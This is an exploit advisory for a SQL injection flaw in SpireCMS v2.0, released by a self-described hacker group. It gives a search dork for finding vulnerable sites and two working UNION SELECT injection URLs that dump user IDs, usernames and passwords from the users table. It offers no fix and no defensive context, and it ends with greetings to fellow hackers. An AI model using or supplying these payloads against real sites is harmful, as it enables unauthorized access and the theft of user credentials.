view source
print?
                                ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************
 
[!]            SpireCMS v2.0 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de
 
***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.spiread.com/
[+] script   : SpireCMS v2.0
[+] Download : http://www.spiread.com/demo/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"photo_album.php?alb_id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/photo_album.php?alb_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users
 
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users
 
[  GReets ]
 
[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS